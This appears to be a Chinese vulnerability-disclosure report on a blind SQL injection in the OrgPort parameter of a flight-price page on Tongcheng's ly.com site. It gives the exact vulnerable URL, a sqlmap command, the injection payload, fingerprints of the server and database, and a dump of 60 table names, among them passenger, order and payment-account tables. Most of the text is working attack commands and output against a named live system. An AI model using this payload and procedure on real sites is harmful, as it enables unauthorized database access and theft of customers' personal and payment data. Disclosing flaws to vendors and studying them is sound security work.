苏州同程旅游网主站存在SQL注入漏洞
http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 参数orgport存在盲注
sqlmap知道数据库类型 --dbms="microsoft sql server" --dbs
看到这个http://wooyun.org/bugs/wooyun-2010-055900 官方说是老页面,就顺手看看新页面有没有,没有想到还真有。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: OrgPort
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'TCFly'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: OrgPort
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: TCFly
[60 tables]
+-----------------------------------------+
| dbo.Air_CabinCode |
| dbo.Air_Craft |
| dbo.Air_News |
| dbo.Air_PortCode |
| dbo.Air_WaysCode |
| dbo.AirportServiceDesk |
| dbo.FlightAirLine |
| dbo.FlightBookerHistory |
| dbo.FlightChangeOrder |
| dbo.FlightChangeOrderDetail |
| dbo.FlightChangeOrderSelfDealLog |
| dbo.FlightCnBus |
| dbo.FlightCoupon |
| dbo.FlightDP |
| dbo.FlightDPLog |
| dbo.FlightDelay |
| dbo.FlightETicketNOMonitor |
| dbo.FlightFCAchievement |
| dbo.FlightFCWorkRecord |
| dbo.FlightFDCache |
| dbo.FlightFinanceOverdue |
| dbo.FlightFinanceRefund |
| dbo.FlightFriendlyLink |
| dbo.FlightInsuranceOrder |
| dbo.FlightLineStat |
| dbo.FlightMailRecord |
| dbo.FlightMerchant |
| dbo.FlightMerchantReturnStat |
| dbo.FlightMerchantUrl |
| dbo.FlightMonitorETicketInfo |
| dbo.FlightORAssignHistory |
| dbo.FlightOrder |
| dbo.FlightOrderControlLog |
| dbo.FlightOrderExtend |
| dbo.FlightOrderLog |
| dbo.FlightOrderRouteInfo |
| dbo.FlightPassenger |
| dbo.FlightPicture |
| dbo.FlightPlatformProduct |
| dbo.FlightPortFloor |
| dbo.FlightRejectOrder |
| dbo.FlightRejectRecord |
| dbo.FlightSKCache |
| dbo.FlightSPOrderRelation |
| dbo.FlightSelfOrder |
| dbo.FlightSpecialPrice |
| dbo.FlightSystemUser |
| dbo.FlightTime |
| dbo.Flight_Wap_Mypassenger |
| dbo.Flight_Wap_Order |
| dbo.IdGenerator |
| dbo.MSreplication_objects |
| dbo.MSreplication_subscriptions |
| dbo.MSsavedforeignkeycolumns |
| dbo.MSsavedforeignkeyextendedproperties |
| dbo.MSsavedforeignkeys |
| dbo.MSsnapshotdeliveryprogress |
| dbo.MSsubscription_agents |
| dbo.SpecialsTicketCache |
| dbo.WebPayAccount |
+-----------------------------------------+
